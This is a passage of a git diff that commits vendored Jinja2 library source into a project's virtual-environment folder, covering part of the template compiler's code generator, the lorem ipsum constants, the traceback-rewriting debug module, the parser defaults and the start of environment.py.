recursive mode if the special loop + # variable is accessed in the body if the body is a scoped block. + extended_loop = ( + node.recursive + or "loop" + in find_undeclared(node.iter_child_nodes(only=("body",)), ("loop",)) + or any(block.scoped for block in node.find_all(nodes.Block)) + ) + + loop_ref = None + if extended_loop: + loop_ref = loop_frame.symbols.declare_parameter("loop") + + loop_frame.symbols.analyze_node(node, for_branch="body") + if node.else_: + else_frame.symbols.analyze_node(node, for_branch="else") + + if node.test: + loop_filter_func = self.temporary_identifier() + test_frame.symbols.analyze_node(node, for_branch="test") + self.writeline(f"{self.func(loop_filter_func)}(fiter):", node.test) + self.indent() + self.enter_frame(test_frame) + self.writeline(self.choose_async("async for ", "for ")) + self.visit(node.target, loop_frame) + self.write(" in ") + self.write(self.choose_async("auto_aiter(fiter)", "fiter")) + self.write(":") + self.indent() + self.writeline("if ", node.test) + self.visit(node.test, test_frame) + self.write(":") + self.indent() + self.writeline("yield ") + self.visit(node.target, loop_frame) + self.outdent(3) + self.leave_frame(test_frame, with_python_scope=True) + + # if we don't have an recursive loop we have to find the shadowed + # variables at that point. Because loops can be nested but the loop + # variable is a special one we have to enforce aliasing for it. + if node.recursive: + self.writeline( + f"{self.func('loop')}(reciter, loop_render_func, depth=0):", node + ) + self.indent() + self.buffer(loop_frame) + + # Use the same buffer for the else frame + else_frame.buffer = loop_frame.buffer + + # make sure the loop variable is a special one and raise a template + # assertion error if a loop tries to write to loop + if extended_loop: + self.writeline(f"{loop_ref} = missing") + + for name in node.find_all(nodes.Name): + if name.ctx == "store" and name.name == "loop": + self.fail( + "Can't assign to special loop variable in for-loop target", + name.lineno, + ) + + if node.else_: + iteration_indicator = self.temporary_identifier() + self.writeline(f"{iteration_indicator} = 1") + + self.writeline(self.choose_async("async for ", "for "), node) + self.visit(node.target, loop_frame) + if extended_loop: + self.write(f", {loop_ref} in {self.choose_async('Async')}LoopContext(") + else: + self.write(" in ") + + if node.test: + self.write(f"{loop_filter_func}(") + if node.recursive: + self.write("reciter") + else: + if self.environment.is_async and not extended_loop: + self.write("auto_aiter(") + self.visit(node.iter, frame) + if self.environment.is_async and not extended_loop: + self.write(")") + if node.test: + self.write(")") + + if node.recursive: + self.write(", undefined, loop_render_func, depth):") + else: + self.write(", undefined):" if extended_loop else ":") + + self.indent() + self.enter_frame(loop_frame) + + self.writeline("_loop_vars = {}") + self.blockvisit(node.body, loop_frame) + if node.else_: + self.writeline(f"{iteration_indicator} = 0") + self.outdent() + self.leave_frame( + loop_frame, with_python_scope=node.recursive and not node.else_ + ) + + if node.else_: + self.writeline(f"if {iteration_indicator}:") + self.indent() + self.enter_frame(else_frame) + self.blockvisit(node.else_, else_frame) + self.leave_frame(else_frame) + self.outdent() + + # if the node was recursive we have to return the buffer contents + # and start the iteration code + if node.recursive: + self.return_buffer_contents(loop_frame) + self.outdent() + self.start_write(frame, node) + self.write(f"{self.choose_async('await ')}loop(") + if self.environment.is_async: + self.write("auto_aiter(") + self.visit(node.iter, frame) + if self.environment.is_async: + self.write(")") + self.write(", loop)") + self.end_write(frame) + + # at the end of the iteration, clear any assignments made in the + # loop from the top level + if self._assign_stack: + self._assign_stack[-1].difference_update(loop_frame.symbols.stores) + + def visit_If(self, node: nodes.If, frame: Frame) -> None: + if_frame = frame.soft() + self.writeline("if ", node) + self.visit(node.test, if_frame) + self.write(":") + self.indent() + self.blockvisit(node.body, if_frame) + self.outdent() + for elif_ in node.elif_: + self.writeline("elif ", elif_) + self.visit(elif_.test, if_frame) + self.write(":") + self.indent() + self.blockvisit(elif_.body, if_frame) + self.outdent() + if node.else_: + self.writeline("else:") + self.indent() + self.blockvisit(node.else_, if_frame) + self.outdent() + + def visit_Macro(self, node: nodes.Macro, frame: Frame) -> None: + macro_frame, macro_ref = self.macro_body(node, frame) + self.newline() + if frame.toplevel: + if not node.name.startswith("_"): + self.write(f"context.exported_vars.add({node.name!r})") + self.writeline(f"context.vars[{node.name!r}] = ") + self.write(f"{frame.symbols.ref(node.name)} = ") + self.macro_def(macro_ref, macro_frame) + + def visit_CallBlock(self, node: nodes.CallBlock, frame: Frame) -> None: + call_frame, macro_ref = self.macro_body(node, frame) + self.writeline("caller = ") + self.macro_def(macro_ref, call_frame) + self.start_write(frame, node) + self.visit_Call(node.call, frame, forward_caller=True) + self.end_write(frame) + + def visit_FilterBlock(self, node: nodes.FilterBlock, frame: Frame) -> None: + filter_frame = frame.inner() + filter_frame.symbols.analyze_node(node) + self.enter_frame(filter_frame) + self.buffer(filter_frame) + self.blockvisit(node.body, filter_frame) + self.start_write(frame, node) + self.visit_Filter(node.filter, filter_frame) + self.end_write(frame) + self.leave_frame(filter_frame) + + def visit_With(self, node: nodes.With, frame: Frame) -> None: + with_frame = frame.inner() + with_frame.symbols.analyze_node(node) + self.enter_frame(with_frame) + for target, expr in zip(node.targets, node.values): + self.newline() + self.visit(target, with_frame) + self.write(" = ") + self.visit(expr, frame) + self.blockvisit(node.body, with_frame) + self.leave_frame(with_frame) + + def visit_ExprStmt(self, node: nodes.ExprStmt, frame: Frame) -> None: + self.newline(node) + self.visit(node.node, frame) + + class _FinalizeInfo(t.NamedTuple): + const: t.Optional[t.Callable[..., str]] + src: t.Optional[str] + + @staticmethod + def _default_finalize(value: t.Any) -> t.Any: + """The default finalize function if the environment isn't + configured with one. Or, if the environment has one, this is + called on that function's output for constants. + """ + return str(value) + + _finalize: t.Optional[_FinalizeInfo] = None + + def _make_finalize(self) -> _FinalizeInfo: + """Build the finalize function to be used on constants and at + runtime. Cached so it's only created once for all output nodes. + + Returns a ``namedtuple`` with the following attributes: + + ``const`` + A function to finalize constant data at compile time. + + ``src`` + Source code to output around nodes to be evaluated at + runtime. + """ + if self._finalize is not None: + return self._finalize + + finalize: t.Optional[t.Callable[..., t.Any]] + finalize = default = self._default_finalize + src = None + + if self.environment.finalize: + src = "environment.finalize(" + env_finalize = self.environment.finalize + pass_arg = { + _PassArg.context: "context", + _PassArg.eval_context: "context.eval_ctx", + _PassArg.environment: "environment", + }.get( + _PassArg.from_obj(env_finalize) # type: ignore + ) + finalize = None + + if pass_arg is None: + + def finalize(value: t.Any) -> t.Any: + return default(env_finalize(value)) + + else: + src = f"{src}{pass_arg}, " + + if pass_arg == "environment": + + def finalize(value: t.Any) -> t.Any: + return default(env_finalize(self.environment, value)) + + self._finalize = self._FinalizeInfo(finalize, src) + return self._finalize + + def _output_const_repr(self, group: t.Iterable[t.Any]) -> str: + """Given a group of constant values converted from ``Output`` + child nodes, produce a string to write to the template module + source. + """ + return repr(concat(group)) + + def _output_child_to_const( + self, node: nodes.Expr, frame: Frame, finalize: _FinalizeInfo + ) -> str: + """Try to optimize a child of an ``Output`` node by trying to + convert it to constant, finalized data at compile time. + + If :exc:`Impossible` is raised, the node is not constant and + will be evaluated at runtime. Any other exception will also be + evaluated at runtime for easier debugging. + """ + const = node.as_const(frame.eval_ctx) + + if frame.eval_ctx.autoescape: + const = escape(const) + + # Template data doesn't go through finalize. + if isinstance(node, nodes.TemplateData): + return str(const) + + return finalize.const(const) # type: ignore + + def _output_child_pre( + self, node: nodes.Expr, frame: Frame, finalize: _FinalizeInfo + ) -> None: + """Output extra source code before visiting a child of an + ``Output`` node. + """ + if frame.eval_ctx.volatile: + self.write("(escape if context.eval_ctx.autoescape else str)(") + elif frame.eval_ctx.autoescape: + self.write("escape(") + else: + self.write("str(") + + if finalize.src is not None: + self.write(finalize.src) + + def _output_child_post( + self, node: nodes.Expr, frame: Frame, finalize: _FinalizeInfo + ) -> None: + """Output extra source code after visiting a child of an + ``Output`` node. + """ + self.write(")") + + if finalize.src is not None: + self.write(")") + + def visit_Output(self, node: nodes.Output, frame: Frame) -> None: + # If an extends is active, don't render outside a block. + if frame.require_output_check: + # A top-level extends is known to exist at compile time. + if self.has_known_extends: + return + + self.writeline("if parent_template is None:") + self.indent() + + finalize = self._make_finalize() + body: t.List[t.Union[t.List[t.Any], nodes.Expr]] = [] + + # Evaluate constants at compile time if possible. Each item in + # body will be either a list of static data or a node to be + # evaluated at runtime. + for child in node.nodes: + try: + if not ( + # If the finalize function requires runtime context, + # constants can't be evaluated at compile time. + finalize.const + # Unless it's basic template data that won't be + # finalized anyway. + or isinstance(child, nodes.TemplateData) + ): + raise nodes.Impossible() + + const = self._output_child_to_const(child, frame, finalize) + except (nodes.Impossible, Exception): + # The node was not constant and needs to be evaluated at + # runtime. Or another error was raised, which is easier + # to debug at runtime. + body.append(child) + continue + + if body and isinstance(body[-1], list): + body[-1].append(const) + else: + body.append([const]) + + if frame.buffer is not None: + if len(body) == 1: + self.writeline(f"{frame.buffer}.append(") + else: + self.writeline(f"{frame.buffer}.extend((") + + self.indent() + + for item in body: + if isinstance(item, list): + # A group of constant data to join and output. + val = self._output_const_repr(item) + + if frame.buffer is None: + self.writeline("yield " + val) + else: + self.writeline(val + ",") + else: + if frame.buffer is None: + self.writeline("yield ", item) + else: + self.newline(item) + + # A node to be evaluated at runtime. + self._output_child_pre(item, frame, finalize) + self.visit(item, frame) + self._output_child_post(item, frame, finalize) + + if frame.buffer is not None: + self.write(",") + + if frame.buffer is not None: + self.outdent() + self.writeline(")" if len(body) == 1 else "))") + + if frame.require_output_check: + self.outdent() + + def visit_Assign(self, node: nodes.Assign, frame: Frame) -> None: + self.push_assign_tracking() + self.newline(node) + self.visit(node.target, frame) + self.write(" = ") + self.visit(node.node, frame) + self.pop_assign_tracking(frame) + + def visit_AssignBlock(self, node: nodes.AssignBlock, frame: Frame) -> None: + self.push_assign_tracking() + block_frame = frame.inner() + # This is a special case. Since a set block always captures we + # will disable output checks. This way one can use set blocks + # toplevel even in extended templates. + block_frame.require_output_check = False + block_frame.symbols.analyze_node(node) + self.enter_frame(block_frame) + self.buffer(block_frame) + self.blockvisit(node.body, block_frame) + self.newline(node) + self.visit(node.target, frame) + self.write(" = (Markup if context.eval_ctx.autoescape else identity)(") + if node.filter is not None: + self.visit_Filter(node.filter, block_frame) + else: + self.write(f"concat({block_frame.buffer})") + self.write(")") + self.pop_assign_tracking(frame) + self.leave_frame(block_frame) + + # -- Expression Visitors + + def visit_Name(self, node: nodes.Name, frame: Frame) -> None: + if node.ctx == "store" and ( + frame.toplevel or frame.loop_frame or frame.block_frame + ): + if self._assign_stack: + self._assign_stack[-1].add(node.name) + ref = frame.symbols.ref(node.name) + + # If we are looking up a variable we might have to deal with the + # case where it's undefined. We can skip that case if the load + # instruction indicates a parameter which are always defined. + if node.ctx == "load": + load = frame.symbols.find_load(ref) + if not ( + load is not None + and load[0] == VAR_LOAD_PARAMETER + and not self.parameter_is_undeclared(ref) + ): + self.write( + f"(undefined(name={node.name!r}) if {ref} is missing else {ref})" + ) + return + + self.write(ref) + + def visit_NSRef(self, node: nodes.NSRef, frame: Frame) -> None: + # NSRefs can only be used to store values; since they use the normal + # `foo.bar` notation they will be parsed as a normal attribute access + # when used anywhere but in a `set` context + ref = frame.symbols.ref(node.name) + self.writeline(f"if not isinstance({ref}, Namespace):") + self.indent() + self.writeline( + "raise TemplateRuntimeError" + '("cannot assign attribute on non-namespace object")' + ) + self.outdent() + self.writeline(f"{ref}[{node.attr!r}]") + + def visit_Const(self, node: nodes.Const, frame: Frame) -> None: + val = node.as_const(frame.eval_ctx) + if isinstance(val, float): + self.write(str(val)) + else: + self.write(repr(val)) + + def visit_TemplateData(self, node: nodes.TemplateData, frame: Frame) -> None: + try: + self.write(repr(node.as_const(frame.eval_ctx))) + except nodes.Impossible: + self.write( + f"(Markup if context.eval_ctx.autoescape else identity)({node.data!r})" + ) + + def visit_Tuple(self, node: nodes.Tuple, frame: Frame) -> None: + self.write("(") + idx = -1 + for idx, item in enumerate(node.items): + if idx: + self.write(", ") + self.visit(item, frame) + self.write(",)" if idx == 0 else ")") + + def visit_List(self, node: nodes.List, frame: Frame) -> None: + self.write("[") + for idx, item in enumerate(node.items): + if idx: + self.write(", ") + self.visit(item, frame) + self.write("]") + + def visit_Dict(self, node: nodes.Dict, frame: Frame) -> None: + self.write("{") + for idx, item in enumerate(node.items): + if idx: + self.write(", ") + self.visit(item.key, frame) + self.write(": ") + self.visit(item.value, frame) + self.write("}") + + visit_Add = _make_binop("+") + visit_Sub = _make_binop("-") + visit_Mul = _make_binop("*") + visit_Div = _make_binop("/") + visit_FloorDiv = _make_binop("//") + visit_Pow = _make_binop("**") + visit_Mod = _make_binop("%") + visit_And = _make_binop("and") + visit_Or = _make_binop("or") + visit_Pos = _make_unop("+") + visit_Neg = _make_unop("-") + visit_Not = _make_unop("not ") + + @optimizeconst + def visit_Concat(self, node: nodes.Concat, frame: Frame) -> None: + if frame.eval_ctx.volatile: + func_name = "(markup_join if context.eval_ctx.volatile else str_join)" + elif frame.eval_ctx.autoescape: + func_name = "markup_join" + else: + func_name = "str_join" + self.write(f"{func_name}((") + for arg in node.nodes: + self.visit(arg, frame) + self.write(", ") + self.write("))") + + @optimizeconst + def visit_Compare(self, node: nodes.Compare, frame: Frame) -> None: + self.write("(") + self.visit(node.expr, frame) + for op in node.ops: + self.visit(op, frame) + self.write(")") + + def visit_Operand(self, node: nodes.Operand, frame: Frame) -> None: + self.write(f" {operators[node.op]} ") + self.visit(node.expr, frame) + + @optimizeconst + def visit_Getattr(self, node: nodes.Getattr, frame: Frame) -> None: + if self.environment.is_async: + self.write("(await auto_await(") + + self.write("environment.getattr(") + self.visit(node.node, frame) + self.write(f", {node.attr!r})") + + if self.environment.is_async: + self.write("))") + + @optimizeconst + def visit_Getitem(self, node: nodes.Getitem, frame: Frame) -> None: + # slices bypass the environment getitem method. + if isinstance(node.arg, nodes.Slice): + self.visit(node.node, frame) + self.write("[") + self.visit(node.arg, frame) + self.write("]") + else: + if self.environment.is_async: + self.write("(await auto_await(") + + self.write("environment.getitem(") + self.visit(node.node, frame) + self.write(", ") + self.visit(node.arg, frame) + self.write(")") + + if self.environment.is_async: + self.write("))") + + def visit_Slice(self, node: nodes.Slice, frame: Frame) -> None: + if node.start is not None: + self.visit(node.start, frame) + self.write(":") + if node.stop is not None: + self.visit(node.stop, frame) + if node.step is not None: + self.write(":") + self.visit(node.step, frame) + + @contextmanager + def _filter_test_common( + self, node: t.Union[nodes.Filter, nodes.Test], frame: Frame, is_filter: bool + ) -> t.Iterator[None]: + if self.environment.is_async: + self.write("(await auto_await(") + + if is_filter: + self.write(f"{self.filters[node.name]}(") + func = self.environment.filters.get(node.name) + else: + self.write(f"{self.tests[node.name]}(") + func = self.environment.tests.get(node.name) + + # When inside an If or CondExpr frame, allow the filter to be + # undefined at compile time and only raise an error if it's + # actually called at runtime. See pull_dependencies. + if func is None and not frame.soft_frame: + type_name = "filter" if is_filter else "test" + self.fail(f"No {type_name} named {node.name!r}.", node.lineno) + + pass_arg = { + _PassArg.context: "context", + _PassArg.eval_context: "context.eval_ctx", + _PassArg.environment: "environment", + }.get( + _PassArg.from_obj(func) # type: ignore + ) + + if pass_arg is not None: + self.write(f"{pass_arg}, ") + + # Back to the visitor function to handle visiting the target of + # the filter or test. + yield + + self.signature(node, frame) + self.write(")") + + if self.environment.is_async: + self.write("))") + + @optimizeconst + def visit_Filter(self, node: nodes.Filter, frame: Frame) -> None: + with self._filter_test_common(node, frame, True): + # if the filter node is None we are inside a filter block + # and want to write to the current buffer + if node.node is not None: + self.visit(node.node, frame) + elif frame.eval_ctx.volatile: + self.write( + f"(Markup(concat({frame.buffer}))" + f" if context.eval_ctx.autoescape else concat({frame.buffer}))" + ) + elif frame.eval_ctx.autoescape: + self.write(f"Markup(concat({frame.buffer}))") + else: + self.write(f"concat({frame.buffer})") + + @optimizeconst + def visit_Test(self, node: nodes.Test, frame: Frame) -> None: + with self._filter_test_common(node, frame, False): + self.visit(node.node, frame) + + @optimizeconst + def visit_CondExpr(self, node: nodes.CondExpr, frame: Frame) -> None: + frame = frame.soft() + + def write_expr2() -> None: + if node.expr2 is not None: + self.visit(node.expr2, frame) + return + + self.write( + f'cond_expr_undefined("the inline if-expression on' + f" {self.position(node)} evaluated to false and no else" + f' section was defined.")' + ) + + self.write("(") + self.visit(node.expr1, frame) + self.write(" if ") + self.visit(node.test, frame) + self.write(" else ") + write_expr2() + self.write(")") + + @optimizeconst + def visit_Call( + self, node: nodes.Call, frame: Frame, forward_caller: bool = False + ) -> None: + if self.environment.is_async: + self.write("(await auto_await(") + if self.environment.sandboxed: + self.write("environment.call(context, ") + else: + self.write("context.call(") + self.visit(node.node, frame) + extra_kwargs = {"caller": "caller"} if forward_caller else None + loop_kwargs = {"_loop_vars": "_loop_vars"} if frame.loop_frame else {} + block_kwargs = {"_block_vars": "_block_vars"} if frame.block_frame else {} + if extra_kwargs: + extra_kwargs.update(loop_kwargs, **block_kwargs) + elif loop_kwargs or block_kwargs: + extra_kwargs = dict(loop_kwargs, **block_kwargs) + self.signature(node, frame, extra_kwargs) + self.write(")") + if self.environment.is_async: + self.write("))") + + def visit_Keyword(self, node: nodes.Keyword, frame: Frame) -> None: + self.write(node.key + "=") + self.visit(node.value, frame) + + # -- Unused nodes for extensions + + def visit_MarkSafe(self, node: nodes.MarkSafe, frame: Frame) -> None: + self.write("Markup(") + self.visit(node.expr, frame) + self.write(")") + + def visit_MarkSafeIfAutoescape( + self, node: nodes.MarkSafeIfAutoescape, frame: Frame + ) -> None: + self.write("(Markup if context.eval_ctx.autoescape else identity)(") + self.visit(node.expr, frame) + self.write(")") + + def visit_EnvironmentAttribute( + self, node: nodes.EnvironmentAttribute, frame: Frame + ) -> None: + self.write("environment." + node.name) + + def visit_ExtensionAttribute( + self, node: nodes.ExtensionAttribute, frame: Frame + ) -> None: + self.write(f"environment.extensions[{node.identifier!r}].{node.name}") + + def visit_ImportedName(self, node: nodes.ImportedName, frame: Frame) -> None: + self.write(self.import_aliases[node.importname]) + + def visit_InternalName(self, node: nodes.InternalName, frame: Frame) -> None: + self.write(node.name) + + def visit_ContextReference( + self, node: nodes.ContextReference, frame: Frame + ) -> None: + self.write("context") + + def visit_DerivedContextReference( + self, node: nodes.DerivedContextReference, frame: Frame + ) -> None: + self.write(self.derive_context(frame)) + + def visit_Continue(self, node: nodes.Continue, frame: Frame) -> None: + self.writeline("continue", node) + + def visit_Break(self, node: nodes.Break, frame: Frame) -> None: + self.writeline("break", node) + + def visit_Scope(self, node: nodes.Scope, frame: Frame) -> None: + scope_frame = frame.inner() + scope_frame.symbols.analyze_node(node) + self.enter_frame(scope_frame) + self.blockvisit(node.body, scope_frame) + self.leave_frame(scope_frame) + + def visit_OverlayScope(self, node: nodes.OverlayScope, frame: Frame) -> None: + ctx = self.temporary_identifier() + self.writeline(f"{ctx} = {self.derive_context(frame)}") + self.writeline(f"{ctx}.vars = ") + self.visit(node.context, frame) + self.push_context_reference(ctx) + + scope_frame = frame.inner(isolated=True) + scope_frame.symbols.analyze_node(node) + self.enter_frame(scope_frame) + self.blockvisit(node.body, scope_frame) + self.leave_frame(scope_frame) + self.pop_context_reference() + + def visit_EvalContextModifier( + self, node: nodes.EvalContextModifier, frame: Frame + ) -> None: + for keyword in node.options: + self.writeline(f"context.eval_ctx.{keyword.key} = ") + self.visit(keyword.value, frame) + try: + val = keyword.value.as_const(frame.eval_ctx) + except nodes.Impossible: + frame.eval_ctx.volatile = True + else: + setattr(frame.eval_ctx, keyword.key, val) + + def visit_ScopedEvalContextModifier( + self, node: nodes.ScopedEvalContextModifier, frame: Frame + ) -> None: + old_ctx_name = self.temporary_identifier() + saved_ctx = frame.eval_ctx.save() + self.writeline(f"{old_ctx_name} = context.eval_ctx.save()") + self.visit_EvalContextModifier(node, frame) + for child in node.body: + self.visit(child, frame) + frame.eval_ctx.revert(saved_ctx) + self.writeline(f"context.eval_ctx.revert({old_ctx_name})") diff --git a/env/Lib/site-packages/jinja2/constants.py b/env/Lib/site-packages/jinja2/constants.py new file mode 100644 index 00000000..41a1c23b --- /dev/null +++ b/env/Lib/site-packages/jinja2/constants.py @@ -0,0 +1,20 @@ +#: list of lorem ipsum words used by the lipsum() helper function +LOREM_IPSUM_WORDS = """\ +a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at +auctor augue bibendum blandit class commodo condimentum congue consectetuer +consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus +diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend +elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames +faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac +hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum +justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem +luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie +mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non +nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque +penatibus per pharetra phasellus placerat platea porta porttitor posuere +potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus +ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit +sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor +tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices +ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus +viverra volutpat vulputate""" diff --git a/env/Lib/site-packages/jinja2/debug.py b/env/Lib/site-packages/jinja2/debug.py new file mode 100644 index 00000000..7ed7e929 --- /dev/null +++ b/env/Lib/site-packages/jinja2/debug.py @@ -0,0 +1,191 @@ +import sys +import typing as t +from types import CodeType +from types import TracebackType + +from .exceptions import TemplateSyntaxError +from .utils import internal_code +from .utils import missing + +if t.TYPE_CHECKING: + from .runtime import Context + + +def rewrite_traceback_stack(source: t.Optional[str] = None) -> BaseException: + """Rewrite the current exception to replace any tracebacks from + within compiled template code with tracebacks that look like they + came from the template source. + + This must be called within an ``except`` block. + + :param source: For ``TemplateSyntaxError``, the original source if + known. + :return: The original exception with the rewritten traceback. + """ + _, exc_value, tb = sys.exc_info() + exc_value = t.cast(BaseException, exc_value) + tb = t.cast(TracebackType, tb) + + if isinstance(exc_value, TemplateSyntaxError) and not exc_value.translated: + exc_value.translated = True + exc_value.source = source + # Remove the old traceback, otherwise the frames from the + # compiler still show up. + exc_value.with_traceback(None) + # Outside of runtime, so the frame isn't executing template + # code, but it still needs to point at the template. + tb = fake_traceback( + exc_value, None, exc_value.filename or "", exc_value.lineno + ) + else: + # Skip the frame for the render function. + tb = tb.tb_next + + stack = [] + + # Build the stack of traceback object, replacing any in template + # code with the source file and line information. + while tb is not None: + # Skip frames decorated with @internalcode. These are internal + # calls that aren't useful in template debugging output. + if tb.tb_frame.f_code in internal_code: + tb = tb.tb_next + continue + + template = tb.tb_frame.f_globals.get("__jinja_template__") + + if template is not None: + lineno = template.get_corresponding_lineno(tb.tb_lineno) + fake_tb = fake_traceback(exc_value, tb, template.filename, lineno) + stack.append(fake_tb) + else: + stack.append(tb) + + tb = tb.tb_next + + tb_next = None + + # Assign tb_next in reverse to avoid circular references. + for tb in reversed(stack): + tb.tb_next = tb_next + tb_next = tb + + return exc_value.with_traceback(tb_next) + + +def fake_traceback( # type: ignore + exc_value: BaseException, tb: t.Optional[TracebackType], filename: str, lineno: int +) -> TracebackType: + """Produce a new traceback object that looks like it came from the + template source instead of the compiled code. The filename, line + number, and location name will point to the template, and the local + variables will be the current template context. + + :param exc_value: The original exception to be re-raised to create + the new traceback. + :param tb: The original traceback to get the local variables and + code info from. + :param filename: The template filename. + :param lineno: The line number in the template source. + """ + if tb is not None: + # Replace the real locals with the context that would be + # available at that point in the template. + locals = get_template_locals(tb.tb_frame.f_locals) + locals.pop("__jinja_exception__", None) + else: + locals = {} + + globals = { + "__name__": filename, + "__file__": filename, + "__jinja_exception__": exc_value, + } + # Raise an exception at the correct line number. + code: CodeType = compile( + "\n" * (lineno - 1) + "raise __jinja_exception__", filename, "exec" + ) + + # Build a new code object that points to the template file and + # replaces the location with a block name. + location = "template" + + if tb is not None: + function = tb.tb_frame.f_code.co_name + + if function == "root": + location = "top-level template code" + elif function.startswith("block_"): + location = f"block {function[6:]!r}" + + if sys.version_info >= (3, 8): + code = code.replace(co_name=location) + else: + code = CodeType( + code.co_argcount, + code.co_kwonlyargcount, + code.co_nlocals, + code.co_stacksize, + code.co_flags, + code.co_code, + code.co_consts, + code.co_names, + code.co_varnames, + code.co_filename, + location, + code.co_firstlineno, + code.co_lnotab, + code.co_freevars, + code.co_cellvars, + ) + + # Execute the new code, which is guaranteed to raise, and return + # the new traceback without this frame. + try: + exec(code, globals, locals) + except BaseException: + return sys.exc_info()[2].tb_next # type: ignore + + +def get_template_locals(real_locals: t.Mapping[str, t.Any]) -> t.Dict[str, t.Any]: + """Based on the runtime locals, get the context that would be + available at that point in the template. + """ + # Start with the current template context. + ctx: "t.Optional[Context]" = real_locals.get("context") + + if ctx is not None: + data: t.Dict[str, t.Any] = ctx.get_all().copy() + else: + data = {} + + # Might be in a derived context that only sets local variables + # rather than pushing a context. Local variables follow the scheme + # l_depth_name. Find the highest-depth local that has a value for + # each name. + local_overrides: t.Dict[str, t.Tuple[int, t.Any]] = {} + + for name, value in real_locals.items(): + if not name.startswith("l_") or value is missing: + # Not a template variable, or no longer relevant. + continue + + try: + _, depth_str, name = name.split("_", 2) + depth = int(depth_str) + except ValueError: + continue + + cur_depth = local_overrides.get(name, (-1,))[0] + + if cur_depth < depth: + local_overrides[name] = (depth, value) + + # Modify the context with any derived context. + for name, (_, value) in local_overrides.items(): + if value is missing: + data.pop(name, None) + else: + data[name] = value + + return data diff --git a/env/Lib/site-packages/jinja2/defaults.py b/env/Lib/site-packages/jinja2/defaults.py new file mode 100644 index 00000000..638cad3d --- /dev/null +++ b/env/Lib/site-packages/jinja2/defaults.py @@ -0,0 +1,48 @@ +import typing as t + +from .filters import FILTERS as DEFAULT_FILTERS # noqa: F401 +from .tests import TESTS as DEFAULT_TESTS # noqa: F401 +from .utils import Cycler +from .utils import generate_lorem_ipsum +from .utils import Joiner +from .utils import Namespace + +if t.TYPE_CHECKING: + import typing_extensions as te + +# defaults for the parser / lexer +BLOCK_START_STRING = "{%" +BLOCK_END_STRING = "%}" +VARIABLE_START_STRING = "{{" +VARIABLE_END_STRING = "}}" +COMMENT_START_STRING = "{#" +COMMENT_END_STRING = "#}" +LINE_STATEMENT_PREFIX: t.Optional[str] = None +LINE_COMMENT_PREFIX: t.Optional[str] = None +TRIM_BLOCKS = False +LSTRIP_BLOCKS = False +NEWLINE_SEQUENCE: "te.Literal['\\n', '\\r\\n', '\\r']" = "\n" +KEEP_TRAILING_NEWLINE = False + +# default filters, tests and namespace + +DEFAULT_NAMESPACE = { + "range": range, + "dict": dict, + "lipsum": generate_lorem_ipsum, + "cycler": Cycler, + "joiner": Joiner, + "namespace": Namespace, +} + +# default policies +DEFAULT_POLICIES: t.Dict[str, t.Any] = { + "compiler.ascii_str": True, + "urlize.rel": "noopener", + "urlize.target": None, + "urlize.extra_schemes": None, + "truncate.leeway": 5, + "json.dumps_function": None, + "json.dumps_kwargs": {"sort_keys": True}, + "ext.i18n.trimmed": False, +} diff --git a/env/Lib/site-packages/jinja2/environment.py b/env/Lib/site-packages/jinja2/environment.py new file mode 100644 index 00000000..ea04e8b4 --- /dev/null +++ b/env/Lib/site-packages/jinja2/environment.py @@ -0,0 +1,1667 @@ +"""Classes for managing templates and their runtime and compile time +options. +""" +import os +import typing +import typing as t +import weakref +from collections import ChainMap +from functools import lru_cache +from functools import partial +from functools import reduce +from types import CodeType + +from markupsafe import Markup + +from . import nodes +from .compiler import CodeGenerator +from .compiler import generate +from .defaults import BLOCK_END_STRING +from .defaults import BLOCK_START_STRING +from .defaults import COMMENT_END_STRING +from .defaults import COMMENT_START_STRING +from .defaults import DEFAULT_FILTERS +from .defaults import DEFAULT_NAMESPACE +from .defaults import DEFAULT_POLICIES +from .defaults import DEFAULT_TESTS +from .defaults import KEEP_TRAILING_NEWLINE +from .defaults import LINE_COMMENT_PREFIX +from .defaults import LINE_STATEMENT_PREFIX +from .defaults import LSTRIP_BLOCKS +from .defaults import NEWLINE_SEQUENCE +from .defaults import TRIM_BLOCKS +from .defaults import VARIABLE_END_STRING +from .defaults import VARIABLE_START_STRING +from .exceptions import TemplateNotFound +from .exceptions import TemplateRuntimeError +from .exceptions import TemplatesNotFound +from .exceptions import TemplateSyntaxError +from .exceptions import UndefinedError +from .lexer import get_lexer +from .lexer import Lexer +from .lexer import TokenStream +from .nodes import EvalContext +from .parser import Parser +from .runtime import Context +from .runtime import new_context +from .runtime import Undefined +from .utils import _PassArg +from .utils import concat +from .utils import consume +from .utils import import_string +from .utils import internalcode +from .utils import LRUCache +from .utils import missing + +if t.TYPE_CHECKING: + import typing_extensions as te + from .bccache import BytecodeCache + from .ext import Extension + from .loaders import BaseLoader + +_env_bound = t.TypeVar("_env_bound", bound="Environment") + + +# for direct template usage we have up to ten living environments +@lru_cache(maxsize=10) +def get_spontaneous_environment(cls: t.Type[_env_bound], *args: t.Any) -> _env_bound: + """Return a new spontaneous environment. A spontaneous environment + is used for templates created directly rather than through an + existing environment. + + :param cls: Environment class to create. + :param args: Positional arguments passed to environment. + """ + env = cls(*args) + env.shared = True + return env + + +def create_cache( + size: int, +) -> t.Optional[t.MutableMapping[t.Tuple[weakref.ref, str], "Template"]]: + """Return the cache class for the given size.""" + if size == 0: + return None + + if size < 0: + return {} + + return LRUCache(size) # type: ignore + + +def copy_cache( + cache: t.Optional[t.MutableMapping], +) -> t.Optional[t.MutableMapping[t.Tuple[weakref.ref, str], "Template"]]: + """Create an empty copy of the given cache.""" + if cache is None: + return None + + if type(cache) is dict: + return {} + + return LRUCache(cache.capacity) # type: ignore + + +def load_extensions( + environment: "Environment", + extensions: t.Sequence[t.Union[str, t.Type["Extension"]]], +) -> t.Dict[str, "Extension"]: + """Load 